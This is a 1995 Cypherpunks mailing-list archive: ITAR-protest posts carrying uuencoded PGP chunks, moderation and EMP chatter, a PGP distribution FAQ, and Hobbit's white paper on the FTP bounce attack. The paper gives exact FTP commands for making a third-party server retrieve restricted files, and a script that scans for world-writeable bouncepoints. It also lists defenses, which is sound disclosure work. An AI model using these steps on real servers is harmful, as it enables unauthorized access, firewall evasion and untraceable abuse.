M$0`]G'"*AMF#]4C$1,S5"$(O!.%!+4$XAV/8@*7PAP>>J`6A$&>Q%W/1#,Z0 ------------------------------------------------------------- Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 From adam at bwh.harvard.edu Tue Jul 11 20:29:18 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 11 Jul 95 20:29:18 PDT Subject: Don't trust the net too much In-Reply-To: Message-ID: <199507120328.XAA02985@bwh.harvard.edu> | > hundered dollars worth of transmitter parts, you can cause transient | > failures with EMF pulse weapons, and for a bit more, you can fry all | > the electronics, then drive away before they have any idea that their | worth of parts. Could you be more specific? | > Go read Winn Schwartaus book "Information Warfare" Then go | > read Sun Tzu. | | I have. I agree, killing people is dumb, but try telling that to your More specifically, few items sensitive electronic items are hardened against electromagnetic pulses. Ever see a speaker interfere with your TV set? Build a big enough speaker, and you can screw with your computers memory. (Of course, if you just use an electromagnet, and not bother to build a speaker around it, you'll be much more energy efficient. :) A big enough pulse can confuse just about any hardware; bigger pulses still can destroy it. Directed (or undirected) pulses are easy to produce with the right amps. Again, check out Schwartau; your local library probably has him. Adam -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From stewarts at ix.netcom.com Tue Jul 11 20:39:13 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 11 Jul 95 20:39:13 PDT Subject: A more sophisticated form of moderation. Message-ID: <199507120337.UAA03191@ix4.ix.netcom.com> At 01:45 PM 7/11/95 -0500, Michael James Gebis wrote: >Specifically, I was thinking along the lines of a newsgroup where only >selected individuals are able to post, but anybody who wants to can read >the group. However, the "selected individuals" could fall into several >categories. Not hard to implement things like this. With the current non-cryptoized moderation system, anybody can post to a moderated group by putting an "Approved:" header line on their article. And articles can be cancelled by anyone who wants to forge an cancel, so articles with forged approvals can be cancelmoosed away if people want. You could set up a cancelbot that trashes any article that doesn't have the magic words from the FAQ Approved: Squeamish Ossifrage in the header, or doesn't have the right digital signature in the approvals, where you've only given teh keys to the Moderation Cabal. Or, for a system where mail has to go to a moderator first, similar to the current mail-to-moderator posting method, you could set up a mail-pool for the moderator's address, that sends each article out to 1..N of the moderators (e.g. to whoever's on duty today, or everybody, or a random k of the moderators for load-sharing), who could then post them. If you want a mailing-list approach, they're easier - just send your mailing list through procmail on the mailhost, and set it up to accept/reject/etc. whoever your list policy wants. If somebody comes out with D News, the crypto-cancel-based system, it can use a digital signature system like RIPEM-SIG (which is exportable) or some equivalent we can build out of PGP after the PGP 3.0 toolkit becomes available. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From liberty at gate.net Tue Jul 11 21:05:15 1995 From: liberty at gate.net (Jim Ray) Date: Tue, 11 Jul 95 21:05:15 PDT Subject: RACIST MILITIA: ATF Message-ID: <199507120402.AAA11172@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- I'm sure that this will be widely covered in the media. _NOT_! [Prediction: *Gentle* wrist slaps, *nobody* fired, promotions.] Also, are there any C-punks in south Florida right now (besides me)? If so, please respond by private e-mail. Thanks. Regards, JMR - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMANHyG1lp8bpvW01AQFUBgP/cNxu8ead5MBGtggEwR/80a0DmA1fUgmy X2xJpXCu7NUGT2rPZR9jni1guBOVHKypC6ZsaW3jDpaENX/l/2YxrE6nakVKR9qm ae46QZC23Lm155ieOOBT8V50MglkWuYhgDf9+w/JxmS11R26pYNezgzuqNsLCGdg 6hq7WK6+t8c= =S2pc - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMANJJioZzwIn1bdtAQE53QGAoOMNWiua7qQp7OD5g8Ok8WsX4EnPtjL3 jU6ONKYHJrhBnNAMPn7z67B/NeGevq5Q =/U9Z -----END PGP SIGNATURE----- From alano at teleport.com Tue Jul 11 22:05:20 1995 From: alano at teleport.com (Alan Olsen) Date: Tue, 11 Jul 95 22:05:20 PDT Subject: PGP Anti- ITAR sig Message-ID: <199507120505.WAA26898@desiree.teleport.com> >This is 1/713 of PGP262i DOS Executable Zipfile UUE'd Collect the entire set! | "Ignorance is no excuse for the law." | alano at teleport.com | |"Would you rather be tortured by the government | Disclaimer: | |forces or the people's liberation army?" -mklprc | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | Free Tibet! (With two proofs of purchace) | | From NMundy5276 at aol.com Tue Jul 11 22:57:59 1995 From: NMundy5276 at aol.com (NMundy5276 at aol.com) Date: Tue, 11 Jul 95 22:57:59 PDT Subject: Down with ITAR - Have YOU exported PGP today? (fwd) Message-ID: <950712015748_30934874@aol.com> -----BEGIN PGP SIGNED MESSAGE----- OK! I've got mine, lets rock. Here's part 14. Who's got 15! PGP.ZIP Part [014/713] - ------------------------------------------------------------------------------ -------------------------------------------------------- MD(?HQM7&Q(.V,-WL8P M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 - ------------------------------------------------------------------------------ -------------------------------------------------------- Get your chunk now, it's going fast! For next chunk to export----->http://dcs.ex.ac.uk/~aba/export/ ____________________________________________________________________________ ____________________________________________________________________________ #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2% Sa2/d0 Only slightly bummed owner of part 015 :-/ Dave Merriman > PGP.ZIP Part [014/713] >- >------------------------------------------------------------------------------ >-------------------------------------------------------- >MD(?HQM7&Q(.V,-WL8P >M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X >MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 >- >------------------------------------------------------------------------------ This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! ------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From hobbit at avian.org Wed Jul 12 00:13:42 1995 From: hobbit at avian.org (*Hobbit*) Date: Wed, 12 Jul 95 00:13:42 PDT Subject: The FTP Bounce Attack Message-ID: <199507120620.CAA18176@narq.avian.org> This discusses one of many possible uses of the "FTP server bounce attack". The mechanism used is probably well-known, but to date interest in detailing or fixing it seems low to nonexistent. This particular example demonstrates yet another way in which most electronically enforced "export restrictions" are completely useless and trivial to bypass. It is chosen in an effort to make the reader sit up and notice that there are some really ill-conceived aspects of the standard FTP protocol. Thanks also to Alain Knaff at imag.fr for a brief but entertaining discussion of some of these issues a couple of months ago which got me thinking more deeply about them. The motive ========== You are a user on foreign.fr, IP address F.F.F.F, and want to retrieve cryptographic source code from crypto.com in the US. The FTP server at crypto.com is set up to allow your connection, but deny access to the crypto sources because your source IP address is that of a non-US site [as near as their FTP server can determine from the DNS, that is]. In any case, you cannot directly retrieve what you want from crypto.com's server. However, crypto.com will allow ufred.edu to download crypto sources because ufred.edu is in the US too. You happen to know that /incoming on ufred.edu is a world-writeable directory that any anonymous user can drop files into and read them back from. Crypto.com's IP address is C.C.C.C. The attack ========== This assumes you have an FTP server that does passive mode. Open an FTP connection to your own machine's real IP address [not localhost] and log in. Change to a convenient directory that you have write access to, and then do: quote "pasv" quote "stor foobar" Take note of the address and port that are returned from the PASV command, F,F,F,F,X,X. This FTP session will now hang, so background it or flip to another window or something to proceed with the rest of this. Construct a file containing FTP server commands. Let's call this file "instrs". It will look like this: user ftp pass -anonymous@ cwd /export-restricted-crypto type i port F,F,F,F,X,X retr crypto.tar.Z quit ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@ ... F,F,F,F,X,X is the same address and port that your own machine handed you on the first connection. The trash at the end is extra lines you create, each containing 250 NULLS and nothing else, enough to fill up about 60K of extra data. The reason for this filler is explained later. Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands: put instrs quote "port C,C,C,C,0,21" quote "retr instrs" Crypto.tar.Z should now show up as "foobar" on your machine via your first FTP connection. If the connection to ufred.edu didn't die by itself due to an apparently common server bug, clean up by deleting "instrs" and exiting. Otherwise you'll have to reconnect to finish. Discussion ========== There are several variants of this. Your PASV listener connection can be opened on any machine that you have file write access to -- your own, another connection to ufred.edu, or somewhere completely unrelated. In fact, it does not even have to be an FTP server -- any utility that will listen on a known TCP port and read raw data from it into a file will do. A passive-mode FTP data connection is simply a convenient way to do this. The extra nulls at the end of the command file are to fill up the TCP windows on either end of the ufred -> crypto connection, and ensure that the command connection stays open long enough for the whole session to be executed. Otherwise, most FTP servers tend to abort all transfers and command processing when the control connection closes prematurely. The size of the data is enough to fill both the receive and transmit windows, which on some OSes are quite large [on the order of 30K]. You can trim this down if you know what OSes are on either end and the sum of their default TCP window sizes. It is split into lines of 250 characters to avoid overrunning command buffers on the target server -- probably academic since you told the server to quit already. If crypto.com disallows *any* FTP client connection from you at foreign.fr and you need to see what files are where, you can always put "list -aR" in your command file and get a directory listing of the entire tree via ufred. You may have to retrieve your command file to the target's FTP server in ASCII mode rather than binary mode. Some FTP servers can deal with raw newlines, but others may need command lines terminated by CRLF pairs. Keep this in mind when retrieving files to daemons other than FTP servers, as well. Other possbilities ================== Despite the fact that such third-party connections are one-way only, they can be used for all kinds of things. Similar methods can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time. A little thought will bring realization of numerous other scary possibilities. Connections launched this way come from source port 20, which some sites allow through their firewalls in an effort to deal with the "ftp-data" problem. For some purposes, this can be the next best thing to source-routed attacks, and is likely to succeed where source routing fails against packet filters. And it's all made possible by the way the FTP protocol spec was written, allowing control connections to come from anywhere and data connections to go anywhere. Defenses ======== There will always be sites on the net with creaky old FTP servers and writeable directories that allow this sort of traffic, so saying "fix all the FTP servers" is the wrong answer. But you can protect your own against both being a third-party bouncepoint and having another one used against you. The first obvious thing to do is allow an FTP server to only make data connections to the same host that the control connection originated from. This does not prevent the above attack, of course, since the PASV listener could just as easily be on ufred.edu and thus meet that requirement, but it does prevent *your* site from being a potential bouncepoint. It also breaks the concept of "proxy FTP", but hidden somewhere in this paragraph is a very tiny violin. The next obvious thing is to prohibit FTP control connections that come from reserved ports, or at least port 20. This prevents the above scenario as stated. Both of these things, plus the usual poop about blocking source-routed packets and other avenues of spoofery, are necessary to prevent hacks of this sort. And think about whether or not you really need an open "incoming" directory. Only allowing passive-mode client data connections is another possibility, but there are still too many FTP clients in use that aren't passive-aware. "A loose consensus and running code" ==================================== There is some existing work addressing this available here at avian.org [and has been for several months, I might add] in the "fixkits archive". Several mods to wu-ftpd-2.4 are presented, which includes code to prevent and log attempts to use bogus PORT commands. Recent security fixes from elsewhere are also included, along with s/key support and various compile-time options to beef up security for specific applications. Stan Barber at academ.com is working on merging these and several other fixes into a true updated wu-ftpd release. There are a couple of other divergent efforts going on. Nowhere is it claimed that any of this work is complete yet, but it is a start toward something I have had in mind for a while -- a network-wide release of wu-ftpd-2.5, with contributions from around the net. The wu-ftpd server has become very popular, but is in sad need of yet another security upgrade. It would be nice to pull all the improvements together into one coordinated place, and it looks like it will happen. All of this still won't help people who insist on running vendor-supplied servers, of course. Sanity-checking the client connection's source port is not implemented specifically in the FTP server fixes, but in modifications to Wietse's tcp-wrappers package since this problem is more general. A simple PORT option is added that denies connections from configurable ranges of source ports at the tcpd stage, before a called daemon is executed. Some of this is pointed to by /src/fixkits/README in the anonymous FTP area here. Read this roadmap before grabbing other things. Notes ===== Adding the nulls at the end of the command file was the key to making this work against a variety of daemons. Simply sending the desired data would usually fail due to the immediate close signaling the daemon to bail out. If WUSTL has not given up entirely on the whole wu-ftpd project, they are keeping very quiet about further work. Bryan O'Connor appears to have many other projects to attend to by now... This is a trivial script to find world-writeable and ftp-owned directories and files on a unix-based anonymous FTP server. You'd be surprised how many of those writeable "bouncepoints" pop out after a short run of something like this. You will have to later check that you can both PUT and GET files from such places; some servers protect uploaded files against reading. Many do not, and then wonder why they are among this week's top ten warez sites... #!/bin/sh ftp -n $1 << FOE quote "user ftp" quote "pass -nobody@" prompt cd / dir "-aR" xxx.$$ bye FOE # Not smart enough to figure out ftp's numeric UID if no passwd file! cat -v xxx.$$ | awk ' BEGIN { idir = "/" ; dirp = 0 } /.:$/ { idir = $0 ; dirp = 1 ; } /^[-d][-r](......w.|........ *[0-9]* ftp *)/ { if (dirp == 1) print idir dirp = 0 print $0 } ' rm xxx.$$ I suppose one could call this a white paper. It is up for grabs at avian.org in /random/ftp-attack as well as being posted in various relevant places. _H* 950712 From mpj at netcom.com Wed Jul 12 00:25:29 1995 From: mpj at netcom.com (Michael Paul Johnson) Date: Wed, 12 Jul 95 00:25:29 PDT Subject: Where to get the latest PGP Message-ID: -----BEGIN PGP SIGNED MESSAGE----- WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) FAQ 12 JULY 1995 (Long version) WHAT IS THE LATEST VERSION OF PGP? BUG WHERE CAN I GET VIACRYPT PGP? WHERE CAN I FTP PGP IN NORTH AMERICA? WHERE IS PGP ON THE WORLD WIDE WEB? WHERE IS PGP ON COMPUSERVE? AOL WHAT BULLETIN BOARD SYSTEMS CARRY PGP? WHERE CAN I FTP PGP CLOSE TO ME? HOW CAN I GET PGP BY EMAIL? WHERE IS MACPGP? WHERE IS VAX PGP? WHERE CAN I GET MORE PGP INFORMATION? WHAT ARE SOME GOOD PGP BOOKS? WHERE CAN I GET PGP LANGUAGE MODULES? IS PGP LEGAL? WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS? WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP? WHERE CAN I GET THE MACPGP KIT? WHERE IS THE PGP 3.0 API DRAFT? WHAT OTHER FILE ENCRYPTION (DOS, MAC) TOOLS ARE THERE? HOW DO I SECURELY DELETE FILES (DOS)? WHAT DO I DO ABOUT THE PASS PHRASE IN MY WINDOWS SWAP FILE? WHAT EVER HAPPENED TO PGPfone(tm)? WHERE DO I GET NAUTILUS? HOW DO I ENCRYPT MY DISK ON-THE-FLY? WHERE IS PGP'S COMPETION? HOW DO I PUBLISH MY PGP PUBLIC KEY? WHICH FAQ IS THE OFFICIAL ONE? CAN I COPY AND REDISTRIBUTE THIS FAQ? For questions not covered here, please see the MAIN alt.security.pgp FAQ at ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt WHAT IS THE LATEST VERSION OF PGP? Platform(s) Latest Version Distribution File Names __________________________________________________________________________ | | | | |DOS, Unix, | Viacrypt PGP 2.7.1 | disk sets | |Mac, Windows, | | | |or WinCIM/CSNav | | | |________________|_____________________|_________________________________| | | | | |Hardware-based | Viacrypt 2.7.1 | disk sets | |PGP/Token | | | |________________|_____________________|_________________________________| | | | | |DOS, Unix, VAX, | MIT PGP 2.6.2 | pgp262.zip (DOS + docs) | |others | | pgp262s.zip (source) | | | | pg262s.zip source on CompuServe | | | | pgp262s.tar.gz (source) | | | | pgp262s.tar.Z (source) | | | | pgp262dc.zip (documentation) | | | | pg262d.zip (docs on CompuServe) | |________________|_____________________|_________________________________| | | | | |Macintosh | MIT PGP 2.6.2 | MacPGP2.6.2-130v1.hqx | | | Mac version 1.3.0 | m262pgp.hqx (same as above) | | | | MacPGP2.6.2-130v1.source.asc | | | | m262pgps.asc (same as above) | |________________|_____________________|_________________________________| | | | | |Power Mac | Zbigniew's "beta" | Fatmacpgp262b131.sea.hqx | | | | f262pgp.hqx (same as above) | | | | Fatmacpgp262b131.src.hqx | | | | f262pgps.hqx (same as above) | |________________|_____________________|_________________________________| | | | | |Amiga | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha | | | | pgp262-a14-020.lha | | | | pgp262-a14-src.lha | | | | PGPAmi262is.lha (international) | |________________|_____________________|_________________________________| | | | | |Atari | Atari MIT PGP 2.6.2 | pgp262st.zip | | | Atari International | pgp262ib.zip | |________________|_____________________|_________________________________| | | | | |OS/2 | MIT PGP 2.6.2 | pgp262-os2.zip | | | | on ftp.gibbon.com | |________________|_____________________|_________________________________| | | | | |Non-USA version | PGP 2.6.2i from | pgp262i.zip | |to avoid RSAREF | Stale Schumacher | pgp262is.zip | |license. | | pgp262is.tar.gz | | | | pgp262i-os2.zip | | | | pgp262i-djgpp.zip | | | | | | | Canadian "mutant" | MacPGP262ca124.exe.sea.hqx | | | not for USA use | MacPGP262ca124.src.sea.hqx | |________________|_____________________|_________________________________| BUG Digital signatures made with keys 2034-2048 bits in length may be corrupt if made by any version of PGP released prior to May 1995. To fix this in the source code, change the line in function make_signature_certificate in crypto.c from byte inbuf[MAX_BYTE_PRECISION], outbuf[MAX_BYTE_PRECISION]; to byte inbuf[MAX_BYTE_PRECISION], outbuf[MAX_BYTE_PRECISION+2]; WHERE CAN I GET VIACRYPT PGP? Viacrypt has versions of PGP complete with licenses for commercial use of the RSA and IDEA encryption algorithms. Viacrypt PGP comes in executable code only (no source code), but it is based on (and just as secure as) the freeware PGP. Viacrypt PGP for Windows is the only real Windows PGP (and even it is partially a quickwin executable that looks like a DOS port). Still, it is much better from an interface standpoint than all the others. Please contact ViaCrypt for pricing (about $100 up), the latest platforms, and availablity at 800-536-2664 8:30am to 5:00pm MST, Monday - Friday. They accept VISA, MasterCard, AMEX and Discover credit cards. If you have further questions, please ask: Paul E. Uhlhorn Director of Marketing, ViaCrypt Products Mail: 9033 N. 24th Avenue Suite 7 Phoenix AZ 85021-2847 Phone: (602) 944-0773 Fax: (602) 943-2601 Internet: viacrypt at acm.org Compuserve: 70304.41 WHERE CAN I FTP PGP IN NORTH AMERICA? If you are in the USA or Canada, you can get PGP by following the instructions in any of: ftp://net-dist.mit.edu/pub/PGP/README ftp://ftp.csn.net/mpj/README.MPJ ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ ftp://ftp.netcom.com/pub/dd/ddt/crypto/READ_ME_FIRST! ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_ftp_instructions.txt ftp://ftp.eff.org Follow the instructions found in README.Dist that you get from one of: ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist gopher.eff.org, 1/Net_info/Tools/Crypto gopher://gopher.eff.org/11/Net_info/Tools/Crypto http://www.eff.org/pub/Net_info/Tools/Crypto/ ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp/ ftp://ftp.gibbon.com/pub/pgp/README.PGP (OS/2 users see also /pub/gcp/gcppgp10.zip) ftp://ftp.wimsey.bc.ca/pub/crypto/software/README WHERE IS PGP ON THE WORLD WIDE WEB? http://web.mit.edu/network/pgp-form.html http://www.ifi.uio.no/~staalesc/PGP/home.html http://rschp2.anu.edu.au:8080/crypt.html http://www.eff.org/pub/Net_info/Tools/Crypto/ http://community.net/community/all/home/solano/sbaldwin http://www.cco.caltech.edu/~rknop/amiga_pgp26.html http://www.csua.berkeley.edu/cypherpunks/home.html http://www.leo.org/archive/os2/crypt/ http://colossus.net/wepinsto/wshome.html WHERE IS PGP ON COMPUSERVE? GO NCSAFORUM. Follow the instructions there to gain access to Library 12: Export Controlled. Compuserve file names are limited, so look for PGP262.ZIP, PG262S.ZIP (source code), PGP262.GZ (Unix source code) and PG262D.ZIP (documentation only). AOL Go to the AOL software library and search "PGP" or ftp from ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp. WHAT BULLETIN BOARD SYSTEMS CARRY PGP? MANY BBS carry PGP. The following carry recent versions of PGP and allow free downloads of PGP. USA 303-343-4053 Hacker's Haven, Denver, CO Lots of crypto stuff here. 303-772-1062 Colorado Catacombs BBS, Longmont CO 8 data bits, 1 stop, no parity, up to 28,800 bps. Use ANSI terminal emulation. For free access: log in with your own name, answer the questions. 303-914-0031 The FreeMatrix ]I[ 314-896-9309 The KATN BBS 317-791-9617 Computer Virus Research Center (CVRC) BBS, Indianapolis, IN Login Name: PGP USER Password: PGP 501-791-0124, 501-791-0125 The Ferret BBS, North Little Rock, AR Login name: PGP USER Password: PGP 508-668-4441 Emerald City, Walpole, MA 601-582-5748 CyberGold BBS 612-690-5556, !CyBERteCH SeCURitY BBS! Minneapolis MN, - write a letter to the sysop requesting full access. 914-667-4567 Exec-Net, New York, NY 915-587-7888, Self-Governor Information Resource, El Paso, Texas UK 01273-688888 GERMANY +49-781-38807 MAUS BBS, Offenburg - angeschlossen an das MausNet +49-521-68000 BIONIC-BBS Login: PGP WHERE CAN I FTP PGP CLOSE TO ME? AU ftp://ftp.cc.adfa.oz.au/pub/security/pgp23/macpgp2.3.cpt.hqx ftp://ftp.iinet.net.au:mirrors/pgp (Australia ONLY) ftp://plaza.aarnet.edu.au/micros/mac/umich/misc/documentation/howtomacpgp2.7.txt DE ftp://ftp.informatik.tu-muenchen.de/pub/comp/os/os2/crypt ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp ftp://ftp.fu-berlin.de/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz ftp://ftp.tu-clausthal.de/pub/atari/misc/pgp/pgp261b.lzh ftp://ftp.uni-kl.de/pub/aminet/util/crypt ftp://ftp.uni-paderborn.de/pub/aminet/util/crypt ftp://ftp.westfalen.de/pd/Atari/Pgp (Atari) ftp://tupac-amaru.informatik.rwth-aachen.de ES ftp://goya.dit.upm.es IT ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP FI ftp://ftp.funet.fi/pub/crypt NL ftp://ftp.nl.net/pub/crypto/pgp ftp.nic.surfnet.nl/surfnet/net-security/encryption/pgp NZ ftp://kauri.vuw.ac.nz ftp://rs950.phys.waikato.ac.nz/pub/incoming/pgp (New Zealand ONLY) SE ftp://leif.thep.lu.se TW ftp://nctuccca.edu.tw/PC/wuarchive/pgp/ UK ftp://ftp.demon.co.uk/pub/amiga/pgp ftp://ftp.ox.ac.uk/pub/crypto/pgp ftp://src.doc.ic.ac.uk/aminet/amiga-boing ftp://unix.hensa.ac.uk/pub/uunet/pub/security/virus/crypt/pgp USA ftp://atari.archive.umich.edu/pub/atari/Utilities/pgp261st.zip (Atari) ftp://ftp.leo.org/pub/comp/os/os2/crypt ftp://wuarchive.wustl.edu/pub/aminet/util/crypt ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.exe.sea.hqx ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.src.sea.hqx ZA ftp://ftp.ee.und.ac.za/pub/crypto/pgp /pub/archimedes /pub/pgp /pub/mac/MacPGP HOW CAN I GET PGP BY EMAIL? If you have access to email, but not to ftp, send a message saying "help" to ftpmail at decwrl.dec.com, mailserv at nic.funet.fi, or ftp-request at netcom.com To get pgp 2.6.2i by email: Send a message to hypnotech-request at ifi.uio.no with your request in the Subject: field. Subject What you will get GET pgp262i.zip MS-DOS executable (uuencoded) GET pgp262is.zip MS-DOS source code (uuencoded) GET pgp262is.tar.gz UNIX source code (uuencoded) For FAQ information, send e-mail to mail-server at rtfm.mit.edu with send usenet/news.answers/ftp-list/faq in the body of the message. WHERE IS MACPGP? ftp://ftp.csn.net/mpj/README.MPJ ftp://ftp.confusion.net/pub/pgp/mac-pgp/README ftp://highway.alinc.com/users/jordyn/mac-pgp/README ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS WHERE IS VAX PGP? Get the full PGP distribution, then get VAXPGP262.TAR.Z from the berkeley site for additional files needed to compile PGP for the VAX and a precompiled version for VAX/VMS 5.5-2. WHERE CAN I GET MORE PGP INFORMATION? ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt ftp://starfire.ne.uiuc.edu/preston/pgpquick.ps (and pgpquick.doc) http://www.prairienet.org/~jalicqui/ http://www.mit.edu:8001/people/warlord/pgp-faq.html http://draco.centerline.com:8080/~franl/crypto.html http://draco.centerline.com:8080/~franl/pgp/bug0.html http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa_paper.ps.gz http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa.paper http://www.cco.caltech.edu/~rknop/amiga_pgp26.html Email pgp-help at hks.net ftp://ds.internic.net/internet-drafts/draft-pgp-pgpformat-00.txt ftp://ds.internic.net/internet-drafts/draft-ietf-pem-mime-08.txt http://www.cis.ohio-state.edu/ ftp://ftp.csn.net/mpj/public/pgp/MacPGP262_manual.sit.hqx http://www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html http://web.cnam.fr/Network/Crypto/ (c'est en Francais) http://web.cnam.fr/Network/Crypto/survey.html (en Anglais) http://www2.hawaii.edu/~phinely/MacPGP-and-AppleScript-FAQ.html ftp://ftp.prairienet.org/pub/providers/pgp/pgpbg11.asc (Beginner's Guide) Beginner's Guide: send email to slutsky at lipschitz.sfasu.edu, subject: bg2pgp WHAT ARE SOME GOOD PGP BOOKS? Protect Your Privacy: A Guide for PGP Users by William Stallings Prentice Hall PTR ISBN 0-13-185596-4 US $19.95 This is a good technical manual for PGP for most users, and makes a better reference than the "official" documentation that comes with PGP. I recommend it highly. PGP: Pretty Good Privacy by Simson Garfinkel O'Reilly & Associates, Inc. ISBN 1-56592-098-8 US $24.95 E-Mail Security: How to Keep Your Electronic Mail Private "Covers PGP/PEM" by Bruce Schneier Wiley Publishing The Computer Privacy Handbook: A Practical Guide to E-Mail Encryption, Data Protection, and PGP PRivacy Software by Andre Bacard Peachpit Press ISBN 1-56609-171-3 US$24.95 800-283-9444 or 510-548-4393 This is an interesting book on the sociology and politics of privacy in the computer age as well as a practical manual on using PGP. Must reading for all members of Congress, presidential staff, members of Parliament, and ordinary citizens who would like to take reasonable steps to protect themselves from some forms of crime that have been made easy by technology. THE OFFICIAL PGP USER'S GUIDE by Philip R. Zimmerman MIT Press April 1995 - 216 pp. - paper - $14.95(US) - ISBN 0-262-74017-6 ZIMPP Standard PGP documentation neatly typeset and bound. PGP SOURCE CODE AND INTERNALS by Philip R. Zimmerman April 1995 - 804 pp. - $55.00(US) - 0-262-24039-4 ZIMPH This is a handy printed reference with commented source code for PGP 2.6.2 with great educational value. This is a great way to study some of the computer science and information theory behind the world's best email privacy tool without having either a computer or reams of printouts handy. Recommended reading on long airline flights for serious students of computer science and computer security. Ordering information for the last two books: Call US Toll Free 1-800-356-0343 or 617-625-8569. Cite code 5CSC and number 661. Allow 4-6 weeks for delivery within North America. Allow 8-12 weeks for delivery outside of North America. How to Use PGP, 61 pages, (Pub #121) from the Superior Broadcasting Company, Box 1533-N, Oil City, PA 16301, phone: (814) 678-8801 (about $10-$13). WHERE CAN I GET PGP LANGUAGE MODULES? These are suitable for most PGP versions. http://www.ifi.uio.no/~staalesc/PGP/language.html German ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha ftp://ftp.informatik.uni-hamburg.de:/pub/virus/crypt/pgp/language/pgp_german.asc ftp://ftp.leo.org/pub/comp/os/os2/crypt/pgp262i-german.zip Italian ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz Japanese ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz Lithuanian ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip Norwegian ftp://ftp.ox.ac.uk/pub/crypto/pgp/languate/pgp23_norwegian.tar.gz ftp://ftp.ox.ac.uk/pub/crypto/pgp/languate/pgp26i_norwegian.zip Romanian ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_romanian.tar.gz ftp://ftp.encomix.es/pub/pgp/lang/pgp-romanian.zip 